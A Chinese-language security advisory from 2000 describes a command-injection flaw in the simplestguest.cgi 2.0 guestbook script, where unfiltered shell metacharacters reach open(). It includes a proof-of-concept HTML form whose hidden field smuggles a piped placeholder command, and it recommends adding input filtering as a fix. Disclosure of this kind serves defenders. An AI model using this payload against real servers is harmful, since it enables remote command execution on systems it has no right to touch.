首页 -> 安全研究

安全研究

安全漏洞
simplestguest.cgi可远程执行命令

发布日期:2000-12-15
更新日期:2000-12-15

受影响系统:

Leif M. Wright simplestguest.cgi 2.0
描述:

Leif M. Wright编写的simplestguest.cgi
http://www.conservatives.net/atheist/scripts/index.html?Download&simplestguest
是一个用来处理网站访问者向留言簿提交留言的脚本,它对输入进行合法性检查时存在一
个漏洞。

由于在调用open( )函数时未能正确地从用户提供的输入中过滤掉shell元字符,结果攻击
者可以使该脚本以web服务器的权限执行任意shell命令。


<*来源:suid(suid@sneakerz.org) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


通过下面的HTML来运行远程服务器的simplestguest.cgi脚本:
<form action=/cgi-bin/simplestguest.cgi method=POST>
<input type=hidden name=required value="NAME">
<input type=hidden name=guestbook
value=" | <command goes here> |">
<input type=hidden name="NAME" value="X">
<input type=submit>
</form>



建议:

临时解决办法:

    NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。

厂商补丁:

    暂无。

浏览次数:6219
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障